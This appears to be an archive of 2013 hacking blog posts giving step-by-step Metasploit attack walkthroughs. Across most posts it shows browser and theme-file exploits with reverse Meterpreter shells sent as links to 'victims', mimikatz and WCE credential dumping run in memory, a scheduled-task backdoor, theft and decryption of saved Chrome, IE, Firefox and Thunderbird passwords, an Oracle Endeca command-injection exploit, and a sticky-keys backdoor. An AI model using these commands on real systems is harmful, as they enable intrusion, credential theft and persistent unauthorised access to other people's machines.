2013-10-04T23:20:00.002+05:30

Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put their method here.

After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You can create FUD payload using Veil.We can also create schedule task for our backdoor.

First create one batch file , put following code in it

@echo off
"C:\Documents and Settings\nirav\Desktop\backdoor.exe"

Then upload your backdoor & created batch file.Please adjust path of batch file according to your upload path of backdoor.

Get clear text password:-

Following are different methods to get clear text password of windows.

(1)using mimikatz or wce get clear text password of victim.

(2) You can also use mimikatz password dump method .

(3)You can also use mimikatz meterpreter plugin which i used in this tutorial.

   meterpreter > load mimikatz
   meterpreter > help mimikatz
   meterpreter > kerberos
   meterpreter > mimikatz_command -h
   meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"

(4)You can use wce & mimikatz in memory without uploading binary.

(a)WCE in memory:-

cd %systemroot%
cd system32
pwd
execute -H -m -d calc.exe -f /root/wce.exe -a "-o foo.txt"
cat foo.txt

(b)Mimikatz in memory:-

cd %systemroot%
cd system32
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'

So till now i upload one batch file ; backdoor & get clear text password.

Now we are going to schedule our backdoor.We are going to use schtasks command. For detail option about schtasks visit here . In this tutorial i schedule my backdoor daily at 22:16. So everyday at 22:16 my backdoor will be executed & i will get shell.

C:\Documents and Settings\nirav> SchTasks /Create /SC DAILY /TN Evil2 /TR "\"C:\Documents and Settings\nirav\Desktop\sch.bat"" /ST 22:16:00

It will ask to enter password which we got before.

You can also use different option like ONIDLE, ONLOGON, and ONSTART & execute different binary according to your need.

Exploit For All IE version(CVE-2013-3893).

2013-10-01T22:07:00.001+05:30

Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from Microsoft, which can be downloaded here.

This module exploits a use-after-free vulnerability that currents targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well.

For more technical Detail view metasploit blog here .

The Metasploit module currently can be only tested on Internet Explorer 9 on Windows 7 SP1 with either Office 2007 or Office 2010 installed,

msf > use exploit/windows/browser/ie_setmousecapture_uaf
msf exploit(ie_setmousecapture_uaf) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ie_setmousecapture_uaf) > set uripath /
uripath => /
msf exploit(ie_setmousecapture_uaf) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ie_setmousecapture_uaf) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(ie_setmousecapture_uaf) > set lport 443
lport => 443
msf exploit(ie_setmousecapture_uaf) > run
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.56.1:443
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.

Send this link to victim. As soon as he open link you will get meterpreter shell.

Hack local network PC using windows theam file.

2013-09-28T18:37:00.000+05:30

This module exploits a vulnerability mainly affecting Microsoft
Windows XP and Windows 2003. The vulnerability exists in the
handling of the Screen Saver path, in the [boot] section. An
arbitrary path can be used as screen saver, including a remote SMB
resource, which allows for remote code execution when a malicious
.theme file is opened, and the "Screen Saver" tab is viewed. The
code execution is also triggered if the victim installs the
malicious theme and stays away from the computer, when Windows tries
to display the screensaver.

Available targets:
Id Name
-- ----
0 Windows XP SP3 / Windows 2003 SP2

msf > use exploit/windows/fileformat/ms13_071_theme
msf exploit(ms13_071_theme) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ms13_071_theme) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_071_theme) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(ms13_071_theme) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.1:4444
msf exploit(ms13_071_theme) > [*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /root/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Ready to deliver your payload on \\192.168.56.1\qggdxi\vleGT.scr
[*] Server started.

Then send your generated theam file to victim using \\192.168.56.1\qggdxi\vleGT.scr link ;he should open it through using smb. So tell him to put this link to run .

As soon as he open file you will get session.

Extract & decrypt Chrome & IE passwords from Remote PC

2013-09-18T21:17:00.003+05:30

In previous post i mentioned how we can extract saved passwords from firefox & thunderbird from rempote PC. Today we are going to extract saved passwords from Google chrome & IE. If you want to know more technical detail you can visit this site.

Chrome stores all the sign-on secrets into the internal database file called 'Web data' in the current user profile folder. Newer version has moved the login passwords related database into new file named 'Login Data'. DPAPI encrypts data based on either the DPAPI_SYSTEM values stored in LSA secrets or the user’s password, you can’t copy the database file to another machine and decrypt without using special tools as we did in case of mozilla.

First download tool ChromePasswordDecryptor from here .

Installed it in windows.We are only interested in windows binary which is located on C:\Program Files\SecurityXploded . So from that directory copy binary ChromePasswordDecryptor.exe to our main OS(Backtrack).

We are going to use two method to extract saved passwords from browser.

(A)In this method we are going to upload our binary to victim pc using meterpreter shell & then we execute it.

(1)Get meterpreter shell.

(2)Upload ChromePasswordDecryptor.exe (Which we copy into Backtract from windows) to victim.

(3)Execute it from shell using following command.
ChromePasswordDecryptor.exe "pwd.txt"

(4)Download pwd.txt
    download pwd.txt /root

(5)Remove pwd.txt from victim & also remove uploaded binary

    rm ChromePasswordDecryptor.exe
    rm pwd.txt

(B)In this method we are going to execute it in memory ; so we do not have to upload it to victim ; but we need system priv for this method.

(1)Get meterpreter shell

(2)Get system priv.

(3)Change directory to C://windows\system32

(4)Execute it in memory using following command
execute -H -m -d calc.exe -f ChromePasswordDecryptor.exe -a "pwds.txt"

(5)download pwds.txt
download pwds.txt /root

(6)Remove pwds.txt from victim
rm pwds.txt

You can also used same method for IE also.Download file from here .

Extract & decrypt passwords from Firefox & Thunderbird.

2013-09-17T13:53:00.001+05:30

Today we are going to extract password from Fireox & Thunderbird which are saved in browser and then try to decrypt that passwords from remote PC. Before some times ; i posted here that how to extract information from saved sqlite database of skype, firefox, chrome using python script.

Most of the morden browser save information in sqlite format. When user enter login information ; firefox asked user to remember password.If user click on remember password then this passwords are saved into firefox database in signons.sqlite. But passwords are encrypted. so just by downloading signons.sqlite we can not extract passwords from it. Signons.sqlite is useless without the key3.db file, which also resides in the profile folder of your application. Passwords in the signons.sqlite file is encrypted with TripleDES in CBC mode. The key used for the encryption is saved in key3.db and encrypted as well.

Firefox Database path in windows:-

[Windows XP]
C:\Documents and Settings\<user_name>\Application Data\Mozilla\Firefox\<random_name>.default

[Windows Vista & Windows 7]
C:\Users\<user_name>\AppData\Roaming\Mozilla\Firefox\<random_name>.default

Firefox Database path in linux
/root/.Mozilla/Firefox/Profile/<random_name>.default

First we have to get meterpreter shell using any known vulnerability or using any metasploit method.

Then we have to download three files from remote PC which are key3.db,signons.sqlite;cert8.db.You can use metasploit post module (use post/multi/gather/firefox_creds)for downloading this file or you can also download manually by browsing directory.

Now we have database file as well as encryption key in key3.db. So now we have to decrypt it. I can not find any third party software to decrypt this passwords for linux platform.But i found one software which is working very well in windows.Download software from here . (It will work for both Firefox & thunderbird)

(1)copy key3.db,signons.sqlite;cert8.db files in some folder which can be browse from windows.

(2)Open windows.
(3)Install that software.
(4)Open it and Just specify firefox installed path & specify folder in which we copied downloaded file.

(5)click on Start recovery button.

Fireox & thunderbird use same encryption technique. So you can also get thunderbird password from above mention method. Just download key3.db,signons.sqlite;cert8.db files from thunderbird folder whose path are as follow

[Windows XP]
C:\Documents and Settings\<user_name>\Application Data\Thunderbird\Profiles\<random_name>.default

[Windows Vista & Windows 7]
C:\Users\<user_name>\AppData\Roaming\Thunderbird\Profiles\<random_name>.default

What is solution?

If you set master password for firefox & thunderbird then without master password ; saved passwords can not be decrypted.

Pentesting of coldfusion web-application.

2013-09-11T18:49:00.000+05:30

ColdFusion is a commercial rapid web application development platform.
CFML = ColdFusion Markup Language

ColdFusion = Adobe’s product that handles CFML page/libs
– Runs on Windows, Solaris, HP/UX and Linux
– Apache, IIS, Jrun

Following modules are Available in metasploit for coldfusion.

msf > search coldfusion

auxiliary/gather/coldfusion_pwd_props
auxiliary/scanner/coldfusion_rds_check
auxiliary/scanner/http/cold_fusion_version
auxiliary/scanner/http/coldfusion_locale_traversal
exploit/windows/http/coldfusion_fckeditor

Following documents are available for pentesting of coldfusion web-application

ColdFusion for Penetration Testers

Coldfusion hacking

ColdFusion Web Shell

If you have good document available for pentesting of coldfusion web-application ; please let me know. We will add it.

Exploit for IE 9 on Windows 7 SP1

2013-09-01T22:35:00.002+05:30

This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems to only affect certain releases of mshtml.dll. For example: This module can be used against version 9.0.8112.16446

Target
IE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)

msf > use exploit/windows/browser/ms13_059_cflatmarkuppointer

msf exploit(ms13_059_cflatmarkuppointer) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ms13_059_cflatmarkuppointer) > set uripath /
uripath => /
msf exploit(ms13_059_cflatmarkuppointer) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(ms13_059_cflatmarkuppointer) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_059_cflatmarkuppointer) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.1:4444
msf exploit(ms13_059_cflatmarkuppointer) > [*] Using URL: http://192.168.56.1:8080/
[*] Server started.

Now send that link to victim; as soon as he open link; you will get meterpreter shell.

Access backtrack from remote computer using ssh & vnc.

2013-08-29T17:21:00.001+05:30

If you want to access your local computer through remote computer ; first you need configure ssh daemon .Because nowadays people are not using telnet due to plain text protocol.

How to configure ssh in Backtrack 5 r3?

(1)First we have to generate ssh key.So type following in terminal.

ssh-keygen

It will generate public/private rsa key pair.By default location of keys is /root/.ssh/id_rsa

(2)Now we will move this generated keys in ssh folder.

cd /etc/ssh
mkdir keys

(3)Now copy generated keys from /root/.ssh/id_rsa & paste into keys folder which we create in second step.

(4)Now type following command in terminal
dpkg-reconfigure openssh-server

(5)Now we have to start ssh daemon ; so type following in terminal
service ssh start

(6)Now everything is setup ; you can use your ssh server via remote machine.
For windows you can also use putty like software.If you are on linux machine than type following command.
ssh -l "username" 192.168.56.1(i.p.)

If you don`t want to use ssh ; i mean you are not comfortable with command line then you can configure vnc.

How to setup VNC in backtrack 5 r3?

(1)apt-get install tightvncserver

(2)tightvncserver

(3)You will promoted to password .

(4)Enter view only password

Now for access of vnc server we have two options

(1)If you are on linux os than use Remote Desktop Viewer

apt-get install vinagre

And from Edit>plugins check vnc option

Now click on connect & enter i.p. address.

(2)If you are on windows os than use tighvnc . Download from here

After installing Start | All Programs | TightVNC | TightVNC Viewer
Add remote host address with port number 192.168.56.1:5901. If you do not enter the port, the Windows version of TightVNC Viewer will assume the port to be 5900 and will not be able to connect.

Now you can see that we can open our backtrack os using vnc from remote pc.

Exploit Oracle Endeca Server with metasploit.

2013-08-27T13:21:00.000+05:30

This module exploits a command injection vulnerability on the Oracle Endeca Server 7.4.0. The vulnerability exists on the createDataStore method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific. This module has been tested successfully on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).

First run ./msfupdate or git pull to update metasploit.

Now when you open metasploit & found error like this
[-]    /opt/msf/modules/exploits/windows/http/oracle_endeca_exec.rb: NameError uninitialized constant Msf::Exploit::Powershell .

Open oracle_endeca_exec.rb file in any editor.
Add this line require 'msf/core/exploit/powershell' after require 'msf/core'.
So it look like
require 'msf/core'
require 'msf/core/exploit/powershell'
Save it & open metasploit again.

Exploit target:

   Id Name
   -- ----
   0   Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits

msf > use exploit/windows/http/oracle_endeca_exec
msf exploit(oracle_endeca_exec) > set rhost 192.168.56.101(victim`s i.p.)
rhost => 192.168.56.101
msf exploit(oracle_endeca_exec) > run

How to get plain text source from shc compiled bash script?

2013-08-25T13:09:00.000+05:30

Shc is used to protect your shell script from modification or inspection. If you created bash script want to distribute it , but dono`t want them to easily readble by other people , then you can use it.

First we see how to compiled bash script to binary?

wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.7.tgz

tar -xvzf shc-3.8.7.tgz

cd shc-3.8.7

make

./shc

You can see shc usage message.

shc Usage: shc [-e date] [-m addr] [-i iopt] [-x cmnd] [-l lopt] [-rvDTCAh] -f script

Now we have script which we want to convert in binary.

./shc -f /script_path

So now you can see that it will convert plain text bash source into binary which extension is .sh.x.

How to retrieve plain text from binary?

The shc compiled binary decrypts and loads the script into memory when started right after we started the binary, just segfault it and retrieve our script from the core dump.

Core dumps are often used to debug errors in Linux or UNIX programs. A core file is generated when an application program abnormally terminates due to bug, operating system security protection schema, or program simply try to write beyond the area of memory it has allocated.

By default most of linux distributions turn off core file creation.

So we need to turn on core file creation.

ulimit -c

If output is zero means that core file is not created.

Now we set core file size limit to 70000 byte

ulimit -c 70000

Now we start binary & segfault it right away.I used IP-Digger binary to get plain text from it.

./IP-Digger4.sh.x& ( sleep 0.02 && kill -SIGSEGV $! )

sleep 0.02 will give the binary enough time to start up and decrypt the original script. The variable $! contains the pid of the last background process started, so we can easily kill it with the segmentation fault signal SIGSEGV (same as kill -11 $!).

+ segmentation fault (core dumped) ./IP-Digger4.sh.x

cat core | strings >plain_text

Now open plain_text file which we created & find plain text source of bash script.I upload source code of ip-digger here .

But if your script is too large then adjust core file size.

Post exploitation & swaparoo backdoor.

2013-08-23T20:55:00.001+05:30

Today we are going to create valid RDP user in victim pc using two method.

(1)As usual get meterpreter session of victim using metasploit.We need system privilege So use getsystem .(getsystem will work in xp. But if victim has windows 7 than you have to use bypassuac module;it will work if victim has admin provilage.But most of time detecetd by AV. So you have to encode it. )

Now we use meterpreter script which create RDP useraccount for logon.
run getgui -u username -p password.

Now Useraccount has been created.You can use rdesktop command to connect with victim using created credentials.

rdesktop victim i.p.

When you complete your session type following command for cleanup process; so after you logoff created useraccount will be deleted.

run multi_console_command -rc /root/msf4/logs/scripts/getgui/clean_up_what_ever_file_name.rc

(2)Now we use another method; it`s backdoor.But it`s physical backdoor; so you have to present at victim pc to get access.But backdoor is created remotely.

Download swaparoo script from here .

Put it into the /opt/msf/scripts/meterpreter folder

After that get meterpreter shell using any method.

Now type run swaparoo -h

Now type run swaparoo

As you can see in image last line is "[+] Press Shift key 5 times at Login Screen and you should be greeted by a shell!"

So when you restart victim pc & login screen appear ; just press shift key 5 times (From victim `s keyboard)you get cmd with system privilege.Now from cmd you can do anything like remove user,add user, change password.

If you want to remove this backdoor then type following command

run swaparoo -r

What`s limitation?

Anyone who is physically present at terminal can get system cmd just by pressing keys.Because it does not ask for credentials.